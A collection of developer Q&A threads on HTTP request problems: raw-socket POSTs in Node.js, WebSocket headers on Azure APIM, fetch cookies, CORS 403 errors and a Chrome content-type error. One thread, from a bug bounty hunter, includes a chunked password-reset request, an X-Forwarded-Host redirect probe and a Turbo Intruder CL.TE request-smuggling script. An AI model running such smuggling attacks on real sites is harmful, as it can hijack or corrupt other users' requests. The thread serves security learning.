NodeJS: Why is my POST request not working?

I'm trying to use the net module in Node.js to send a POST request over a raw socket connection.
A GET request sent the same way does work, but I can't seem to get the POST request to work.
This is the code:
socket.write(`POST /page.php HTTP/1.1\r\n
Host: domain.com\r\n
Connection: close\r\n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\r\n
User-Agent: Mozilla/5.0 (MeeGo; NokiaN9) AppleWebKit/534.13 (KHTML, like Gecko) NokiaBrowser/8.5.0 Mobile Safari/534.13\r\n
Upgrade-Insecure-Requests: 1\r\n
Accept-Encoding: gzip, deflate\r\n
Accept-Language: en-US,en;q=0.9\r\n
Cache-Control: max-age=0\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Content-Length: 0\r\n\r\n`);
I've "debugged" it, and I've noticed some 301 Moved Permanently and temporary redirect responses from the host.
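One thing worth noting: a JavaScript template literal keeps its literal line breaks, so the code above sends \r\n followed by an extra \n between header lines, which many servers reject or misparse. Here is a minimal sketch of the same request with the header lines joined explicitly (the host and path are the question's placeholders):

const net = require('net');

// Build the request as one string so no stray "\n" from template-literal
// line breaks ends up between the header lines.
const body = ''; // empty form body, matching Content-Length: 0 above
const request =
  'POST /page.php HTTP/1.1\r\n' +
  'Host: domain.com\r\n' +
  'Connection: close\r\n' +
  'Content-Type: application/x-www-form-urlencoded\r\n' +
  `Content-Length: ${Buffer.byteLength(body)}\r\n` +
  '\r\n' +
  body;

const socket = net.connect(80, 'domain.com', () => socket.write(request));
socket.on('data', (chunk) => process.stdout.write(chunk));

The 301 responses may simply mean the host redirects plain HTTP to HTTPS; for an HTTPS target you would open the connection with the tls module instead of net.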

Related

Azure APIM throws error for WebSocket API due to Connection: Keep-Alive,Upgrade

I have REST and WebSocket APIs on the Azure API Management (APIM) services portal. The WebSocket API redirects to a different Web PubSub service, based on input parameters from the clients/frontend, for different development environments.
When hitting the WebSocket API from Google Chrome, I am able to successfully establish the connection end-to-end.
When hitting the same WebSocket API from Firefox, I get an InvalidWebsocketUpgrade error from the APIM service.
This happens because Chrome sends Connection: Upgrade in the socket connection request headers, while Firefox sends Connection: Keep-Alive, Upgrade.
Chrome Request:
GET wss://apim-test.azure-api.net/qa/socket?access_token=eyJhbGc HTTP/1.1
Host: apim-ecv.azure-api.net
Connection: Upgrade
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36
Upgrade: websocket
Origin: https://abc.xyz.com
Sec-WebSocket-Version: 13
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Sec-WebSocket-Key: GTWCGvTFJN82sAl8gVv+VA==
Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Sec-WebSocket-Protocol: json.webpubsub.azure.v1
Firefox request:
GET wss://apim-test.azure-api.net/qa/socket?access_token=eyJhbGciOi HTTP/1.1
Host: apim-ecv.azure-api.net
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-WebSocket-Version: 13
Origin: https://az-qa2.ecarevault.com
Sec-WebSocket-Protocol: json.webpubsub.azure.v1
Sec-WebSocket-Extensions: permessage-deflate
Sec-WebSocket-Key: r764n2hSpKKr0Y63z1Ok3A==
Connection: keep-alive, Upgrade
Sec-Fetch-Dest: websocket
Sec-Fetch-Mode: websocket
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket
Do I need to configure anything to support this on APIM, or anywhere else?
Glad that you got the solution in Microsoft Q&A. Posting the suggestion over here to help other community members, as this is a feature request and may be helpful for members with related discussions.
According to this document, the Connection header needs to contain only Upgrade, because this is the WebSocket protocol: as of now APIM accepts only Upgrade as the value of the Connection header. Microsoft is working on supporting the keep-alive, Upgrade values, so this could be raised as a feature request.
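For anyone who wants to verify this behavior outside a browser, here is a rough sketch of a manual WebSocket handshake from Node.js in which the client fully controls the Connection header. The endpoint and subprotocol are taken from the question; the access token is elided and the key is a throwaway random value:

const https = require('https');
const crypto = require('crypto');

// Manual upgrade request so we can send exactly "Connection: Upgrade",
// which is the only value APIM currently accepts.
const req = https.request({
  host: 'apim-test.azure-api.net',
  path: '/qa/socket?access_token=...',
  headers: {
    Connection: 'Upgrade',
    Upgrade: 'websocket',
    'Sec-WebSocket-Version': '13',
    'Sec-WebSocket-Key': crypto.randomBytes(16).toString('base64'),
    'Sec-WebSocket-Protocol': 'json.webpubsub.azure.v1',
  },
});
req.on('upgrade', (res, socket) => {
  console.log('Handshake accepted:', res.statusCode); // expect 101
  socket.end();
});
req.on('response', (res) => console.log('Rejected with status', res.statusCode));
req.end();

Note that Firefox's keep-alive, Upgrade value cannot be changed from page JavaScript (Connection is a forbidden header), so until APIM supports it the fix has to come from the service side.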

Browser is not adding cookie on some requests

We are running an application (local app) inside another application (moodle) as a plugin.
What happens is that when our app tries to access the GraphQL backend, the browser doesn't add the cookies, even though the cookie is available in document.cookie before the request is sent. Also, before the app is opened in the iframe, a few requests are made from Moodle to the backend server, and the browser does add the cookie to those requests.
Following are the request headers
moodle -> backend
Host: graphql.app.home
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: iframe
Referer: https://moodle.home:8443/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: cb_ltiid=s%3AF0FJpsc8bVe9ZqyLzgNgK7flKfGf4W7u.2GL43c7XLV11BzHXCS%2B7AvQKBAS9xg%2BNc7gaj264%2Bks
app (from moodle iFrame) -> backend
Host: graphql.app.home
Connection: keep-alive
Content-Length: 118
Pragma: no-cache
Cache-Control: no-cache
accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
content-type: application/json
Origin: https://app.home
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://app.home/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Thanks for the help.
It was an issue with fetch not sending the cookie, because of:
fetch won't send cookies, unless you set the credentials init option.
(Since Aug 25, 2017. The spec changed the default credentials policy
to same-origin. Firefox changed since 61.0b13.)
The solution was to pass credentials: 'include' in the fetch options.
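For completeness, a short sketch of what that looks like; the URL and query here are illustrative, based on the hosts in the question:

// credentials: 'include' makes fetch attach cookies even for cross-origin requests.
fetch('https://graphql.app.home/graphql', {
  method: 'POST',
  credentials: 'include',
  headers: { 'content-type': 'application/json' },
  body: JSON.stringify({ query: '{ __typename }' }),
});

Note that for a cross-site request the server must also respond with Access-Control-Allow-Credentials: true and an explicit Access-Control-Allow-Origin (not *), and in current browsers the cookie itself needs the SameSite=None; Secure attributes.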

Understanding reason for 403 Forbidden error

I'm trying to run a web application that I've built in an iframe on another domain. I'm able to load the page within the iframe, but any AJAX request on the page results in a 403 error, as below:
General
Request URL: https://test.mydomain.com/get_extra_services/
Request Method: POST
Status Code: 403 Forbidden
Remote Address: 207.38.86.14:443
Referrer Policy: no-referrer-when-downgrade
Response headers
Connection: keep-alive
Content-Length: 1382
Content-Type: text/html
Date: Thu, 18 Jun 2020 22:57:41 GMT
Server: nginx
X-Content-Type-Options: nosniff
Request headers
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: keep-alive
Content-Length: 22
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: _ga=GA1.2.2146753382.1592180975; _gid=GA1.2.1219012919.1592286837
DNT: 1
Host: test.mydomain.com
Origin: https://test.mydomain.com
Referer: https://test.mydomain.com/order/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36
X-CSRFToken: null
X-Requested-With: XMLHttpRequest
Form data
serviceid: 18
checked: 1
Any thoughts on what is causing this error?
Thanks!
You need to set up CORS on the server to allow requests from a different domain.
https://enable-cors.org/
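What the setup looks like depends on the backend. As one sketch, if the server were a Node.js/Express app, the cors middleware could allow the embedding domain; the framework and the origin value here are assumptions, since the question doesn't say what the server runs:

const express = require('express');
const cors = require('cors');

const app = express();
app.use(cors({
  origin: 'https://embedding-site.example', // the domain hosting the iframe
  credentials: true,                        // required if cookies are included
}));
app.post('/get_extra_services/', (req, res) => res.json({ ok: true }));
app.listen(3000);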

Strange response when using Turbo Intruder

I'm a bug bounty hunter and just new to it. A few days ago, I read about the request smuggling vulnerability, and just after that I started looking for it on the Internet. Yesterday, I found a website where, when I add X-Forwarded-Host: google.com to the headers, it redirects me to https://www.google.com. This is very hard to exploit on its own, so I thought about combining it with request smuggling. I chose the change-password request as the target:
POST /my-rx/forgot-password HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.example.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
Connection: close
Cookie: <my_cookie>
Upgrade-Insecure-Requests: 1
email=mymail%40gmail.com&submit=Reset+My+Password&csrf_token=cb5a82b3df1e45c7b95d25edb46cfbf3
I converted it to chunked:
POST /my-rx/forgot-password HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.example.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
Connection: close
Cookie: <my_cookie>
Upgrade-Insecure-Requests: 1
Transfer-Encoding: chunked
6b
email=mymail%40gmail.com&submit=Reset+My+Password&csrf_token=cb5a82b3df1e45c7b95d25edb46cfbf3
0
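(An editorial aside: the chunk-size line must be the chunk's byte length in hexadecimal, and 6b (107) does not match the 93-byte body shown, though the pasted values may simply have been redacted. A quick way to compute it, sketched in Node.js:)

// The chunk-size line is the chunk's length in bytes, written in hex.
const body = 'email=mymail%40gmail.com&submit=Reset+My+Password&csrf_token=cb5a82b3df1e45c7b95d25edb46cfbf3';
console.log(Buffer.byteLength(body).toString(16)); // "5d" (93 bytes) for this body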
But when I sent it, it gave me a 503 response with a client read error. It looks like the server doesn't accept chunked. Still, I wanted to continue, so I downloaded the HTTP Request Smuggler and Turbo Intruder extensions for Burp Suite and ran a Smuggle attack (CL.TE). It generated this attack script in Python:
# if you edit this file, ensure you keep the line endings as CRLF or you'll have a bad time

def queueRequests(target, wordlists):
    # to use Burp's HTTP stack for upstream proxy rules etc, use engine=Engine.BURP
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=5,
                           requestsPerConnection=1,
                           resumeSSL=False,
                           timeout=10,
                           pipeline=False,
                           maxRetriesPerRequest=0,
                           engine=Engine.THREADED,
                           )

    # This will prefix the victim's request. Edit it to achieve the desired effect.
    prefix = '''GET /hopefully404 HTTP/1.1
X-Ignore: X'''

    # The request engine will auto-fix the content-length for us
    attack = target.req + prefix
    engine.queue(attack)

    victim = target.req
    for i in range(14):
        engine.queue(victim)
        time.sleep(0.05)

def handleResponse(req, interesting):
    table.add(req)
Then I ran it using Turbo Intruder, and I was very surprised: it sent 14 requests, but only 12 of them got a 503 and the remaining 2 got a 200. Notably, the 200 response headers contained transfer-encoding: chunked. I have tried a few times and it always gives the same result: 1 or 2 requests get a 200. But something is strange here: in the code, the prefix is GET /hopefully404 HTTP/1.1 followed by X-Ignore: X. After a few tests I think this is not the request smuggling bug, because the responses show they belong to the original request, not to the prefix in the code (I have tried changing the prefix too, and it's still 200, not the 400, 404, etc. that I expected).
So, does anyone (it must take a very professional hacker) know what vulnerability I am facing? Thank you!
First of all, your hand-converted chunked request is a TE.CL probe, but after using the Burp extension you found it's CL.TE, so the problem may be there.
Since the responses have you a bit confused, I recommend you work through the PortSwigger HTTP request smuggling labs; I completed them recently, and they will make your fundamentals pretty strong!

ERR_INVALID_SIGNED_EXCHANGE error in Google Chrome

I've set up my simple website with a valid Let's Encrypt SSL certificate (from certbot). My nginx config is very short and trivial.
The website shows up correctly in the latest Firefox: it shows a 404 page, which is OK to me and works as expected.
If I try Google Chrome, I get an error:
The webpage at https://example.org/ might be temporarily down or it
may have moved permanently to a new web address.
ERR_INVALID_SIGNED_EXCHANGE
I assume that the application/signed-exchange part of the headers may be causing this.
What is this header and should I remove it from the response?
Request
GET / HTTP/1.1
Host: example.org
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9,ru;q=0.8
DNT: 1
Response
HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 29 Mar 2019 12:05:49 GMT
Content-Type: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Content-Length: 345
Connection: keep-alive
What to fix?
The Content-Type in the response is incorrect: it is echoing back the request's Accept header. It should be a single type, as Steffen Ullrich said. For a 404 page, I suspect you want Content-Type: text/html.
This may be something particular to your nginx config. On my server, 404 pages have Content-Type: text/html.
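If the misconfiguration is in nginx itself, here is a hedged sketch of a conventional 404 setup that sends a single, explicit media type; the paths and names are illustrative, not from the poster's config:

server {
    listen 443 ssl;
    server_name example.org;

    error_page 404 /404.html;      # custom 404 page
    location = /404.html {
        internal;
        default_type text/html;    # one concrete media type, not the Accept list
    }
}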
